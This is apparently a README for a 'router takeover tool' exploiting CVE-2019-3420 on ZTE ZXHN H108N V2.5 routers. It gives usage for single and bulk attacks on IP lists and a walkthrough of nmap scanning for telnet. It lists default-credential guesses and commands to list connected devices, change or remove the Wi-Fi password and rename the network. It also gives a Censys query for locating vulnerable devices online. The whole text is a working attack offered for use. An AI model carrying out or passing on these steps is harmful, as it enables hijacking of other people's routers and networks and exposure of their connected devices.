ZTE ZXHN H108N V2.5 Router Takeover Tool
CVE-2019-3420
java main (Gateway IP / IP of the Portal) (ssid) (Password)
ssid = Name of the Network (Wireless)
Password = Password of the Network (Wireless)
java bulk (ssid) (Password)
in hosts.txt type:
192.168.1.1,192.168.1.11,
to Attack 192.168.1.1 and 192.168.1.11.
First, Let’s get our Gateway IP Address. Which is often 192.168.1.1..
Then let’s scan our IP with nmap, We’ll see that port 23 is open.
let’s establish a connection. He Asks for the Username and Password..
We can use https://github.com/Ligeti15/ZXHN-H108N-Login .Or try these.
Usernames: admin root zte public toor
Passwords: admin root zte public toor
BOOM ! .Now we have access to the Gateway. You will see something like ZTE>
Commands:
- ip dhcp br0 status → See Devices Connected to the Router
- rt node ssid [NAME] → Change the SSID of the Wi-Fi to [NAME]
- rt node wpapsk [PASSWORD] → Change the Password of the Wi-Fi to [PASSWORD]
- rt node save → Save Changes
- rt node authmode open → Remove the Password and Open the Network
- show all / sys atsh / rtwlan rtdisp → Show Information
Also You can Discover all Options Available with these Commands: - ? → General Commands
- rt ? → Wireless Commands
You can Search Censys for Vulnerable Devices using this Query: (80.http.get.title%3A+ZXHN+H108N+V2.5)